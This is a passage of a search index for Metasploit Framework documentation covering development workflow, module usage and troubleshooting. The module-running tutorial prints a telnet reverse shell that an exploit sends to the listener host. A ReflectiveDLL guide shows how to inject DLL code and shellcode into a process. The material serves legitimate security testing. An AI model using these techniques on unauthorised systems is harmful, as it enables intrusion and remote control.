    "relUrl": "/docs/pentesting/active-directory/kerberos/unconstrained_delegation.html"
  },"824": {
    "doc": "Unstable Modules",
    "title": "Landing to Unstable",
    "content": "Unstable modules have their own special directory structure – they should not hit the regular modules/ subdirectory, since we don’t want to conflict with existing or future modules. We also want to make it easy to spot which modules are unstable. So, new modules should get landed there with the following procedure. | First, get unstable up to date with upstream/master: git checkout unstable; git merge upstream/master; push upstream | Create a local branch off of the PR: git checkout -b temp-pr1234 --track upstream/pr/1234 | Create a local branch off of unstable: git checkout -b unstable-pr1234-modulename --track upstream/unstable | Find the module paths: git diff upstream/master...upstream/pr/1234 --name-only | Git checkout the module(s) in question: git checkout temp-pr1234 modules/exploits/path/to/module.rb | Move the files to the appropriate directory: git mv modules/exploits/path/to/module.rb unstable-modules/exploits/incomplete | Commit the result: git commit | Send a pull request targeting the unstable branch, not the master branch: https://github.com/YOUR GITHUB USERNAME/metasploit-framework/compare/rapid7:unstable…unstable-pr1234-modulename?expand=1 . Be sure to mention the original pull request number in the description so the PR will be updated accordingly. | . This assumes you’re set up for development using the instructions mentioned at https://r-7.co/MSF-DEV and have configured Rapid7’s branch as the “upstream” repo. ",
    "url": "/docs/development/maintainers/process/unstable-modules.html#landing-to-unstable",
    "relUrl": "/docs/development/maintainers/process/unstable-modules.html#landing-to-unstable"
  },"825": {
    "doc": "Unstable Modules",
    "title": "Example",
    "content": "For an example of this procedure, see PR #2801. ",
    "url": "/docs/development/maintainers/process/unstable-modules.html#example",
    "relUrl": "/docs/development/maintainers/process/unstable-modules.html#example"
  },"826": {
    "doc": "Unstable Modules",
    "title": "Unstable Libraries",
    "content": "If someone has library changes that cannot be merged to master, we cannot hang on to them in unstable. There is no sensible way to maintain that kind of branch over any reasonable time period, since conflicts will surely abound soon. Unstable scripts and plugins are okay, though. ",
    "url": "/docs/development/maintainers/process/unstable-modules.html#unstable-libraries",
    "relUrl": "/docs/development/maintainers/process/unstable-modules.html#unstable-libraries"
  },"827": {
    "doc": "Unstable Modules",
    "title": "Rescuing unstable modules",
    "content": "If you’d like to rescue an unstable module, great! Just note that it’s an unstable rescue in the pull request, and the original PR number (if you can find it), when you pull it back out. You can do a similar git checkout to grab the file and then git mv it to the right spot again. ",
    "url": "/docs/development/maintainers/process/unstable-modules.html#rescuing-unstable-modules",
    "relUrl": "/docs/development/maintainers/process/unstable-modules.html#rescuing-unstable-modules"
  },"828": {
    "doc": "Unstable Modules",
    "title": "Safety",
    "content": "This is not unstable in the Debian sense – they’re not latest versions, they get no fixes unless someone adopts them, and they may end up crashing out all of framework when loaded. No guarantees are made, ever, despite things like ExploitRanking. ",
    "url": "/docs/development/maintainers/process/unstable-modules.html#safety",
    "relUrl": "/docs/development/maintainers/process/unstable-modules.html#safety"
  },"829": {
    "doc": "Unstable Modules",
    "title": "Unstable Modules",
    "content": "Sometimes, modules contributed to Metasploit don’t quite cross the finish line. This can be for a variety of reasons. Most often, it is because the module submission was a “drive-by” – the original author is not interested (or not able) to implement and test needed changes in order to make the module production worthy. Luckily, git makes it easy to be a pack rat for these unfinished modules. We have a separate branch for these unstable modules, imaginatively named, Unstable. ",
    "url": "/docs/development/maintainers/process/unstable-modules.html",
    "relUrl": "/docs/development/maintainers/process/unstable-modules.html"
  },"830": {
    "doc": "Using Git",
    "title": "Using Git",
    "content": "Use this collection of resources to work with the Metasploit Framework’s git repository. | Cheatsheet | Reference Sites | Setting Up a Metasploit Development Environment - this will walk you through creating a pull request | Landing Pull Requests - this is the procedure that Metasploit core devs go through to merge your request | Remote Branch Pruning | . A fork is when you snapshot someone else’s codebase into your own repo, presumably on github.com, and that codebase may have its own branches, but you are usually snapshotting the master branch. You usually then clone your fork to your local machine. You then create your own branches, which are offshoots of your own fork. Those snapshots, even if pushed to your github are not a part of the original codebase, in this case rapid7/metasploit-framework. If you then submit a pull request, your branch (generally) can be pulled into the original codebase’s master branch (usually… you could be pulled into an experimental branch or something if your code was a massive change or something, but that’s not typical). You only fork once, you clone as many times as you have machines on which you want to code, and you branch, commit, and push as often as you like (you don’t always have to push, you can push later or not at all, but you’ll have to push before doing a pull request, a.k.a. PR), and you submit a PR when you are ready. See below . github.com/rapid7/metasploit-framework --&amp;gt; fork --&amp;gt; github.com/&amp;lt;...&amp;gt;/metasploit-framework ^ | git clone git://github.com/&amp;lt;...&amp;gt;/metasploit-framework.git | `-- accepted &amp;lt;-- pull request V ^ /home/&amp;lt;...&amp;gt;/repo/metasploit-framework | | github.com/&amp;lt;...&amp;gt;/metasploit-framework/branch_xyz | | | V V | V branch_abc ... `-- push &amp;lt;-- branch_xyz . (Thanks to kernelsmith for this excellent description) . ",
    "url": "/docs/development/get-started/git/using-git.html",
    "relUrl": "/docs/development/get-started/git/using-git.html"
  },"831": {
    "doc": "Using local Gems",
    "title": "Introduction",
    "content": "Oftentimes, when testing Gem file updates, particularly from other repositories such as rex-powershell or rex-text, one will need to find some way of testing whether the updated Gem file works as expected within Metasploit Framework. There are many different ways to do this; however, this guide will only focus on one method for simplicity’s sake, as this is the one that has been known to work with the least amount of prerequisite setup. ",
    "url": "/docs/development/maintainers/ruby-gems/using-local-gems.html#introduction",
    "relUrl": "/docs/development/maintainers/ruby-gems/using-local-gems.html#introduction"
  },"832": {
    "doc": "Using local Gems",
    "title": "Instructions",
    "content": ". | Set up a working Metasploit development setup as described at the Setting Up a Development Environment wiki page. Be sure to set up your SSH keys as part of this setup. | Clone whatever PR it is that you wish to work on. For example to work on https://github.com/rapid7/rex-text/pull/30, do git clone [email protected]:rapid7/rex-text.git, then cd rex-text, followed by git checkout origin/pr/30. | Go to the location of your git clone of Metasploit Framework and do cp Gemfile.local.example Gemfile.local. Ensure that no file named Gemfile.local.lock exists. If one does, remove it. | Inside your Gemfile.local file, edit it so it looks something like the following: | . ## # Example Gemfile.local file for Metasploit Framework # # The Gemfile.local file provides a way to use other gems that are not # included in the standard Gemfile provided with Metasploit. # This filename is included in Metasploit's .gitignore file, so local changes # to this file will not accidentally show up in future pull requests. This # example Gemfile.local includes all gems in Gemfile using instance_eval. # It also creates a new bundle group, 'local', to hold additional gems. # # This file will not be used by default within the framework. As such, one # must first install the custom Gemfile.local with bundle: # bundle install --gemfile Gemfile.local # # Note that msfupdate does not consider Gemfile.local when updating the # framework. If it is used, it may be necessary to run the above bundle # command after the update. # ### # Include the Gemfile included with the framework. This is very # important for picking up new gem dependencies. msf_gemfile = File.join(File.dirname(__FILE__), 'Gemfile') if File.readable?(msf_gemfile) instance_eval(File.read(msf_gemfile)) end # Create a custom group group :local do gem 'rex-powershell', path: '/home/gwillcox/git/rex-powershell' end . Notice in particular the final part of this code: . 
# Create a custom group group :local do gem 'rex-powershell', path: '/home/gwillcox/git/rex-powershell' end . For each gem you want to test, you will need both the name of the gem, for example rex-powershell or rex-text, followed by path: and the path where the corresponding Git repository for that gem is on disk. Do this for each custom gem that you want to test out, then save and close Gemfile.local. | Whilst still inside the cloned Metasploit Framework git repository, execute bundle install --gemfile Gemfile.local. You should see a line similar to the following: | . Using rex-powershell 0.1.87 from source at `/home/gwillcox/git/rex-powershell` . | If any errors occur, follow the directions in the output to try and resolve the conflicts. If all else fails, delete Gemfile.local.lock and run bundle install --gemfile Gemfile.local again. | . ",
    "url": "/docs/development/maintainers/ruby-gems/using-local-gems.html#instructions",
    "relUrl": "/docs/development/maintainers/ruby-gems/using-local-gems.html#instructions"
  },"833": {
    "doc": "Using local Gems",
    "title": "Using local Gems",
    "content": " ",
    "url": "/docs/development/maintainers/ruby-gems/using-local-gems.html",
    "relUrl": "/docs/development/maintainers/ruby-gems/using-local-gems.html"
  },"834": {
    "doc": "Running modules",
    "title": "Getting started",
    "content": "Assuming you have installed Metasploit, either with the official Rapid7 nightly installers or through Kali, you can use the msfconsole command to open Metasploit: . _ _ / \\ /\\ __ _ __ /_/ __ |\\ / | _____ \\ \\ ___ _____ | / \\ _ \\ \\ | \\/| | ___\\ |- -| /\\ / __\\ | -__/ || || |- -|_| | _|__ |_ / -\\ __\\ \\ | | \\__/| |_ |/ |____/ \\___\\/ /\\ \\\\___/ \\/ \\__|_\\ \\___\\ =[ metasploit v6.3.35-dev-0fc88a8050 ] + -- --=[ 2357 exploits - 1227 auxiliary - 413 post ] + -- --=[ 1387 payloads - 46 encoders - 11 nops ] + -- --=[ 9 evasion ] Metasploit Documentation: https://docs.metasploit.com/ msf6 &amp;gt; . Finding modules . Metasploit is based around the concept of modules. The most commonly used module types are: . | Auxiliary - Auxiliary modules do not exploit a target, but can perform data gathering or administrative tasks | Exploit - Exploit modules leverage vulnerabilities in a manner that allows the framework to execute arbitrary code on the target host | Payloads - Arbitrary code that can be executed on a remote target to perform a task, such as creating users, opening shells, etc | Post - Post modules are used after a machine has been compromised. They perform useful tasks such as gathering, collecting, or enumerating data from a session. | . You can use the search command to search for modules: . msf6 &amp;gt; search type:auxiliary http html title tag Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/scanner/http/title normal No HTTP HTML Title Tag Content Grabber Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/http/title msf6 &amp;gt; . You can use a Metasploit module by specifying the full module name. The prompt will be updated to indicate the currently active module: . msf6 &amp;gt; use auxiliary/scanner/http/title msf6 auxiliary(scanner/http/title) &amp;gt; . Running Auxiliary modules . 
Auxiliary modules do not exploit a target, but can perform data gathering or administrative tasks. For instance, a module extracting the HTTP title from a server: . msf6 &amp;gt; use auxiliary/scanner/http/title msf6 auxiliary(scanner/http/title) &amp;gt; . Each module offers configurable options which can be viewed with the show options, or aliased options, command: . msf6 auxiliary(scanner/http/title) &amp;gt; show options Module options (auxiliary/scanner/http/title): Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html RPORT 80 yes The target port (TCP) SHOW_TITLES true yes Show the titles on the console as they are grabbed SSL false no Negotiate SSL/TLS for outgoing connections STORE_NOTES true yes Store the captured information in notes. Use \"notes -t http.title\" to view TARGETURI / yes The base path THREADS 1 yes The number of concurrent threads (max one per host) VHOST no HTTP server virtual host View the full module info with the info, or info -d command. msf6 auxiliary(scanner/http/title) &amp;gt; . To set a module option, use the set command. We will set the RHOST option - which represents the target host(s) that the module will run against: . msf6 auxiliary(scanner/http/title) &amp;gt; set RHOSTS google.com RHOSTS =&amp;gt; google.com . The run command will run the module against the target, showing the target’s HTTP title: . msf6 auxiliary(scanner/http/title) &amp;gt; run [+] [142.250.180.14:80] [C:301] [R:http://www.google.com/] [S:gws] 301 Moved [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed . New in Metasploit 6 there is added support for running modules with options set as part of the run command. For instance, setting both RHOSTS and enabling HttpTrace functionality: . 
msf6 auxiliary(scanner/http/title) &amp;gt; run rhosts=google.com httptrace=true #################### # Request: #################### GET / HTTP/1.1 Host: google.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 #################### # Response: #################### HTTP/1.1 301 Moved Permanently Location: http://www.google.com/ Content-Type: text/html; charset=UTF-8 Server: gws Content-Length: 219 &amp;lt;HTML&amp;gt;&amp;lt;HEAD&amp;gt;&amp;lt;meta http-equiv=\"content-type\" content=\"text/html;charset=utf-8\"&amp;gt; &amp;lt;TITLE&amp;gt;301 Moved&amp;lt;/TITLE&amp;gt;&amp;lt;/HEAD&amp;gt;&amp;lt;BODY&amp;gt; &amp;lt;H1&amp;gt;301 Moved&amp;lt;/H1&amp;gt; The document has moved &amp;lt;A HREF=\"http://www.google.com/\"&amp;gt;here&amp;lt;/A&amp;gt;. &amp;lt;/BODY&amp;gt;&amp;lt;/HTML&amp;gt; [+] [142.250.180.14:80] [C:301] [R:http://www.google.com/] [S:gws] 301 Moved [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf6 auxiliary(scanner/http/title) &amp;gt; . Running exploit modules . Exploit modules require a vulnerable target. It is recommended to set up your own local test environment to run modules against. For instance in a Virtual Machine, or with Docker. There are multiple pre-built vulnerable test environments including: . | Metasploitable2 | Metasploitable3 | . For instance - targeting a vulnerable Metasploitable2 VM and using the unix/misc/distcc_exec module: . msf6 &amp;gt; use unix/misc/distcc_exec [*] Using configured payload cmd/unix/reverse_bash msf6 exploit(unix/misc/distcc_exec) &amp;gt; . Exploit modules will generally at a minimum require the following options to be set: . | RHOST - The remote target host address | LHOST - The listen address. Important This may need to be set to your tun0 IP address or similar, if you are connecting to your target over a VPN | PAYLOAD - The code to be executed after an exploit is successful. 
For instance creating a user, or a Metasploit session. Often this can be left as the default value, but may sometimes require configuration | . Each module offers configurable options which can be viewed with the show options, or aliased options, command: . msf6 exploit(unix/misc/distcc_exec) &amp;gt; options Module options (exploit/unix/misc/distcc_exec): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html RPORT 3632 yes The target port (TCP) Payload options (cmd/unix/reverse_bash): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic Target View the full module info with the info, or info -d command. msf6 exploit(unix/misc/distcc_exec) &amp;gt; . For this scenario you can manually set each of the required option values (RHOST, LHOST, and optionally PAYLOAD): . msf6 exploit(unix/misc/distcc_exec) &amp;gt; set rhost 192.168.123.133 rhost =&amp;gt; 192.168.123.133 msf6 exploit(unix/misc/distcc_exec) &amp;gt; set lhost 192.168.123.1 lhost =&amp;gt; 192.168.123.1 msf6 exploit(unix/misc/distcc_exec) &amp;gt; set payload cmd/unix/reverse payload =&amp;gt; cmd/unix/reverse . The run command will run the module against the target, there is also an aliased exploit command which will perform the same action: . msf6 exploit(unix/misc/distcc_exec) &amp;gt; run [+] sh -c '(sleep 4375|telnet 192.168.123.1 4444|while : ; do sh &amp;amp;&amp;amp; break; done 2&amp;gt;&amp;amp;1|telnet 192.168.123.1 4444 &amp;gt;/dev/null 2&amp;gt;&amp;amp;1 &amp;amp;)' [*] Started reverse TCP double handler on 192.168.123.1:4444 [*] Accepted the first client connection... [*] Accepted the second client connection... 
[*] Command: echo BmpMGFX6NDVlh5h0; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket B [*] B: \"BmpMGFX6NDVlh5h0\\r\\n\" [*] Matching... [*] A is input... [*] Command shell session 2 opened (192.168.123.1:4444 -&amp;gt; 192.168.123.133:48578) at 2023-09-21 14:42:42 +0100 whoami daemon . New in Metasploit 6 there is added support for running modules with options set as part of the run command: . msf6 exploit(unix/misc/distcc_exec) &amp;gt; run rhost=192.168.123.133 lhost=192.168.123.1 payload=cmd/unix/reverse [+] sh -c '(sleep 4305|telnet 192.168.123.1 4444|while : ; do sh &amp;amp;&amp;amp; break; done 2&amp;gt;&amp;amp;1|telnet 192.168.123.1 4444 &amp;gt;/dev/null 2&amp;gt;&amp;amp;1 &amp;amp;)' [*] Started reverse TCP double handler on 192.168.123.1:4444 [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo QqL1Uzom6eBFilyL; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket B [*] B: \"QqL1Uzom6eBFilyL\\r\\n\" [*] Matching... [*] A is input... [*] Command shell session 1 opened (192.168.123.1:4444 -&amp;gt; 192.168.123.133:52314) at 2023-09-21 13:52:40 +0100 whoami daemon . ",
    "url": "/docs/using-metasploit/basics/using-metasploit.html#getting-started",
    "relUrl": "/docs/using-metasploit/basics/using-metasploit.html#getting-started"
  },"835": {
    "doc": "Running modules",
    "title": "Running modules",
    "content": " ",
    "url": "/docs/using-metasploit/basics/using-metasploit.html",
    "relUrl": "/docs/using-metasploit/basics/using-metasploit.html"
  },"836": {
    "doc": "ReflectiveDLL Injection",
    "title": "Using the ReflectiveDll loader in a metasploit module.",
    "content": "First, let’s be clear. I have used this exactly once, but there exists little in the way of guidance on how ReflectiveDll injection works in Framework, so I figure poor guidance is better than none. I am in part hoping that someone who knows how it works will come along and correct this, à la Cunningham’s Law. This documentation assumes that you have some familiarity with DLLs already. Step 1 - Make your DLL . Use Visual Studio 2013 and make a standard, empty DLL. Do not attempt to add the reflective DLL stuff yet. When you make the DLL, make sure that you have at least three files: A header file with the function declarations, a c(pp) file with the functions that ‘do’ the exploit, and a DllMain file with the DllMain function. I find that testing the DLL outside the reflective loader helps tremendously, so in the header file, I declare my working function as an extern, C-style function: extern \"C\" __declspec (dllexport) void PrivEsc(void); . I think using C as the language over cpp would make life marginally easier, as you can combine the source code into one project. Using cpp meant I needed to have separate projects, or at least using my limited compiler knowledge that’s how I got it to work. I noticed OJ was able to extend his c project (exploits/capcom_sys_exec) to include the reflectiveloader, but I could not seem to do the same for my cpp project. Store your project in external/source/exploits/&amp;lt;identifier&amp;gt;/&amp;lt;projectname&amp;gt;. That’s not written in stone. The project I just finished had both DLL and EXE, so I have external/source/exploits/&amp;lt;identifier&amp;gt;/dll and external/source/exploits/&amp;lt;identifier&amp;gt;/exe. Just don’t be a jerk and do something hard to follow. Your requirements may differ, and we’re not super particular as long as it makes sense. 
I suggest the identifier to make life easier, then a project name because you’ll be bringing the reflective loader project into the identifier folder, and at least I like to have some separation between the two. Step 2 Write the DLL using an extern, C-linkage entry point to make testing easier . In this case, I was writing a privesc, so I called it PrivEsc because I am super-imaginative and I have done enough code maintenance that I try to be nice to the next dev. By declaring it an external function and using C-style linkages, you can test the function independently using the rundll32.exe binary. For example, if the dll were named mydll.dll, you can run the privEsc alone with the command &amp;gt; rundll32.exe mydll.dll, PrivEsc . That way, you can isolate the behavior of the exploit before adding a payload. Because I was using a privesc, I just made the last line of the privesc system(\"cmd.exe\"); so I could verify that on the target machine. If I got a system-level cmd prompt, I won! . Step 3 Add ReflectiveDLL Injection to it. This is actually pretty simple. Once your code is doing what it is supposed to do, add the ReflectiveDLL injection to it. Move the rdi (ReflectiveDLL injection) code into your existing project and add the inject project into your solution. Again, this worked for me and appears to be a popular choice. When you copy the ReflectiveDLL code into your project, you are going to replace your DllMain file with the ReflectiveDll.c file. Include the header file containing your desired entry point so that when DllMain gets launched, it can find your desired entry point. I also noticed and appreciated that others structured the code into two parts: Exploit and Exploiter. Exploiter does the heavy lifting with functions, and Exploit calls the functions and runs the shellcode after the exploit completes. 
For example, I made a privesc and the code required to accomplish the elevation was bundled in a function called PrivEsc contained within my Exploiter.cpp file. The Exploit file was very simple in comparison: . #include &amp;lt;Windows.h&amp;gt; #include \"Exploit.h\" #include \"Exploiter.h\" static VOID ExecutePayload(LPVOID lpPayload) { VOID(*lpCode)() = (VOID(*)())lpPayload; lpCode(); return; } VOID Exploit(LPVOID lpPayload) { PrivEsc(); ExecutePayload(lpPayload); } . That ExecutePayload function is there to… well…. Execute the payload. We’ll talk about it later, but make sure that you have it accepting a pointer and executing it. That’ll be how we get a payload into the running thread. All the Exploit.cpp needs to do is give a clear way for me to run the code I wanted to get system, then call the function responsible for starting the shellcode. In my case, all I needed to do was to somehow run PrivEsc and then ExecutePayload(pPayload). Sure enough, if you check out the ReflectiveDll.c file, you can see that it is really straightforward and should look a lot like your previous DllMain function, except there’s a function call in DLL_PROCESS_ATTACH: . #include \"ReflectiveLoader.h\" #include \"Exploit.h\" BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved) { BOOL bReturnValue = TRUE; switch (dwReason) { case DLL_QUERY_HMODULE: if (lpReserved != NULL) *(HMODULE *)lpReserved = hAppInstance; break; case DLL_PROCESS_ATTACH: hAppInstance = hinstDLL; // MessageBox(0, \"In DLLMain\", \"Status\", MB_OK); Exploit(lpReserved); break; case DLL_PROCESS_DETACH: case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: break; } return bReturnValue; } . One thing to understand- despite the feelings I had reading through the framework side, you must specify the entry point for the code you want executed in DLL_PROCESS_ATTACH. We are going to be (quasi) calling DllMain, and DLL_PROCESS_ATTACH will fire, thus giving us code execution in the remote process context. 
As you create the rest of your code, remember that lpReserved from DllMain will contain the address of your payload. Be sure that lpReserved has a clear path to your call of ExecutePayload(). Some of the output from the framework side of the injection was confusing to me because I am used to loading DLLs explicitly and implicitly, and some of the framework methods made it sound like we were not relying on DLL_PROCESS_ATTACH. We are, but in a slightly more round-about way. That said, remember if you go back to troubleshooting just your exploit code in the extern function, DLL_PROCESS_ATTACH will still execute if you use rundll32.exe to call your function. Be sure to comment out your calls in DLL_PROCESS_ATTACH if you go back to debugging unless you want dueling exploits. OK, so at this point, you’ve got a DLL with a function that does something you want, and even better, it compiles! Move that binary to the data directory corresponding to the external directory you used above, i.e. if you used external/source/exploits/myfancyexploit, put your binary in data/exploits/myfancyexploit/. If you can automate that move as a post build step, even better! . Now that we have the binary, we need to execute it on target- Enter Framework! . ",
    "url": "/docs/development/developing-modules/libraries/using-reflectivedll-injection.html#using-the-reflectivedll-loader-in-a-metasploit-module",
    "relUrl": "/docs/development/developing-modules/libraries/using-reflectivedll-injection.html#using-the-reflectivedll-loader-in-a-metasploit-module"
  },"837": {
    "doc": "ReflectiveDLL Injection",
    "title": "Step 4: Adding the framework module",
    "content": "Once you’ve got the DLL working and have it compiling with ReflectiveLoader, you have to make a framework module to use it. OJ’s exploits/capcom_sys_exec is a great place to start looking as an example; it is super easy and simple to read, so let’s review: . (1) Make sure you have a handle to a process. The easiest way to get a handle to a process is to launch your own: notepad_process = client.sys.process.execute('notepad.exe', nil, {'Hidden' =&amp;gt; true}) . (2) We need to write to that process and launch a thread in the process, so let’s get a handle to the process with ALL_ACCESS attributes: process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS) . (3) Grab the path to your binary file: library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'myfancyexploit', 'myfancyexploit.dll') . Replace the directory and file names with the ones for your binary. (3.5) OJ went ahead and expanded the path; likely this is because he’s used filepath hijacking in the past: library_path = ::File.expand_path(library_path) . (4) Now, here’s where things get fun: inject your DLL directly into the memory of notepad: exploit_mem, offset = inject_dll_into_process(process, library_path) . That function allocates memory in the process and loads up the DLL. There is a second method that allows you to upload DLL data, so you could create a payload using a template and load that without the DLL touching the local or remote disk, but I have not had cause to use it. Unfortunately, this is where my grasp of things gets tenuous because it departs from my experience of traditional DLL loading with LoadLibrary and GetProcAddress. We copied the DLL into the remote process memory, but we have not “loaded” it, so DLL_PROCESS_ATTACH is not executed. That’s a good thing, as we have not yet provided the payload! . I square this by basically treating it like process hollowing, but on a thread level. 
Watching OJ’s ReflectiveDLL injection video might help: https://www.youtube.com/watch?v=ZKznMBWUQ_c . You may want to watch it daily for a month or so. Regardless, now we have a process with our exploit DLL mapped into its memory, but not doing anything. Now we need to get the payload into the process too, so we can get exploit and payload execution. Getting the payload in there is honestly not much different than getting the DLL data in there. (5) Just allocate some RWX memory and copy the shellcode over. There’s a method for that: payload_mem = inject_into_process(process, payload.encoded) . To be clear, that’s the first time you should have dealt with the payload, because while it is annoying how much goes on in the background in Framework, when you know it is happening, Framework is awesome! . Now, if you’ve been paying attention to the return values from the above methods, we have three important values: (1) exploit_mem, which has the address of the DLL loaded into memory, (2) offset, which (I think) contains the offset to the DllMain function inside the DLL loaded into memory, and (3) payload_mem, which contains the address of your payload. (6) Now, with those three values, and our code stored in the process’s memory, things make a lot more sense. We just need to create a thread in the process and point it to the DllMain function with the address of our payload as the lpReserved parameter. process.thread.create(exploit_mem + offset, payload_mem) . (7) What I’m still unclear about: (7.1) How do we get the offset value? If we check out inject_dll_into_process, it shows that it is searching the PE for ReflectiveLoader, and that’s not a string I can find as an entry point. I do not understand why that gives us the offset to what I believe to be DllMain when it appears to be searching for ReflectiveLoader…? (7.2) There are a few ways to use ReflectiveDllLoader, and I wish I could read more on using it as an import like OJ does in that capcom_sys_exec. ",
    "url": "/docs/development/developing-modules/libraries/using-reflectivedll-injection.html#step-4-adding-the-framework-module",
    "relUrl": "/docs/development/developing-modules/libraries/using-reflectivedll-injection.html#step-4-adding-the-framework-module"
  },"838": {
    "doc": "ReflectiveDLL Injection",
    "title": "ReflectiveDLL Injection",
    "content": "Update: This is kept here mostly for backup purposes. There is now a reflective dll template available that should help you in your efforts a lot more. ",
    "url": "/docs/development/developing-modules/libraries/using-reflectivedll-injection.html",
    "relUrl": "/docs/development/developing-modules/libraries/using-reflectivedll-injection.html"
  },"839": {
    "doc": "Using Rubocop",
    "title": "Rubocop",
    "content": "Rubocop is a great tool for beginning and experienced Ruby coders. Previously, we suggested that developers run Rubocop on code to give suggestions for improvement. Since then, we’ve worked hard to get the rules right, and now we ask everyone submitting Ruby code to run the code through Rubocop with automatic fixes enabled. ",
    "url": "/docs/development/quality/using-rubocop.html#rubocop",
    "relUrl": "/docs/development/quality/using-rubocop.html#rubocop"
  },"840": {
    "doc": "Using Rubocop",
    "title": "Installing Rubocop",
    "content": "Installing Rubocop is really easy. Simply go to your metasploit-framework directory and run: gem install rubocop . ",
    "url": "/docs/development/quality/using-rubocop.html#installing-rubocop",
    "relUrl": "/docs/development/quality/using-rubocop.html#installing-rubocop"
  },"841": {
    "doc": "Using Rubocop",
    "title": "Running Rubocop",
    "content": "Run rubocop -a &amp;lt;ruby file&amp;gt; . But I copied it from another module! . Consistency is a virtue only when it is correct. (In all seriousness, use your best judgement here, and don’t be afraid to ask.) Also, we allow cleaning up other modules too, but be forewarned: please have a way to test any modules you clean up! . ",
    "url": "/docs/development/quality/using-rubocop.html#running-rubocop",
    "relUrl": "/docs/development/quality/using-rubocop.html#running-rubocop"
  },"842": {
    "doc": "Using Rubocop",
    "title": "Using Rubocop",
    "content": " ",
    "url": "/docs/development/quality/using-rubocop.html",
    "relUrl": "/docs/development/quality/using-rubocop.html"
  },"843": {
    "doc": "What my Rex Proto SMB Error means",
    "title": "What does my Rex::Proto::SMB Error mean?",
    "content": "All SMB error codes are explained in the following MSDN documentation: . http://msdn.microsoft.com/en-us/library/ee441884.aspx . The following is a list of commonly seen errors when using a Metasploit module that involves SMB: . | STATUS_ACCESS_DENIED | . If you are testing against newer Windows systems such as Windows 7, by default you will see STATUS_ACCESS_DENIED because these systems no longer allow remote access to the share. To change this, the target machine will need to manually change the LocalAccountTokenFilterPolicy setting to 1 in the registry: . Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System] \"LocalAccountTokenFilterPolicy\"=dword:00000001 . | STATUS_LOGON_FAILURE | . Invalid SMBUSER or SMBPASS datastore option. Or, in Local Security Settings, you should probably set “Network access: Sharing and security model for local accounts” to “Local users authenticate as themselves”. | STATUS_BAD_NETWORK_NAME | . Invalid SMB share datastore option. | STATUS_LOGON_TYPE_NOT_GRANTED | . On Windows, in Local Security Settings, set “Network access: Sharing and security model for local accounts” to “Local users authenticate as themselves”. ",
    "url": "/docs/development/developing-modules/libraries/smb_library/what-my-rex-proto-smb-error-means.html#what-does-my-rexprotosmb-error-mean",
    "relUrl": "/docs/development/developing-modules/libraries/smb_library/what-my-rex-proto-smb-error-means.html#what-does-my-rexprotosmb-error-mean"
  },"844": {
    "doc": "What my Rex Proto SMB Error means",
    "title": "What my Rex Proto SMB Error means",
    "content": " ",
    "url": "/docs/development/developing-modules/libraries/smb_library/what-my-rex-proto-smb-error-means.html",
    "relUrl": "/docs/development/developing-modules/libraries/smb_library/what-my-rex-proto-smb-error-means.html"
  },"845": {
    "doc": "Why CVE is not available",
    "title": "Why is a CVE Not Available?",
    "content": "This documentation explains why sometimes you might see this message in either msfconsole or module documentation: . CVE: Not available . This message indicates that, as far as the Metasploit team knows, there is no CVE assigned to that particular module at the moment. There are multiple reasons why this might happen: . | The vendor does not wish to assign a CVE. | There is a delay in the process of assigning a CVE. | The module is not meant to target a specific CVE. Likely something generic. | We are unable to find a matching CVE because there isn’t enough technical information to verify. | . The Metasploit team will continue to monitor existing modules without any CVEs, and update them as needed. If you believe the module’s CVE information is inaccurate or out-of-date, please feel free to submit a pull request to us. Thank you! :-) . ",
    "url": "/docs/using-metasploit/other/why-cve-is-not-available.html#why-is-a-cve-not-available",
    "relUrl": "/docs/using-metasploit/other/why-cve-is-not-available.html#why-is-a-cve-not-available"
  },"846": {
    "doc": "Why CVE is not available",
    "title": "Why CVE is not available",
    "content": " ",
    "url": "/docs/using-metasploit/other/why-cve-is-not-available.html",
    "relUrl": "/docs/using-metasploit/other/why-cve-is-not-available.html"
  },"847": {
    "doc": "Work needed to allow msfdb to use postgresql common",
    "title": "Work needed to allow msfdb to use postgresql-common",
    "content": "Linux distributions, such as Debian and Kali Linux, use postgresql-common (Multi-Version/Multi-Cluster PostgreSQL architecture) wrappers to interact with one or more PostgreSQL installations. Therefore, commands such as initdb and pg_ctl are not in the user’s PATH. msfdb currently assumes these programs are available in the PATH. In order to support platforms that use the postgresql-common wrappers, msfdb would need to determine if it is running on such a platform and modify the commands used to perform the various setup and configuration operations. See the section “msfdb support for postgresql-common” for additional details. ",
    "url": "/docs/development/propsals/work-needed-to-allow-msfdb-to-use-postgresql-common.html#work-needed-to-allow-msfdb-to-use-postgresql-common",
    "relUrl": "/docs/development/propsals/work-needed-to-allow-msfdb-to-use-postgresql-common.html#work-needed-to-allow-msfdb-to-use-postgresql-common"
  },"848": {
    "doc": "Work needed to allow msfdb to use postgresql common",
    "title": "msfdb support for postgresql-common",
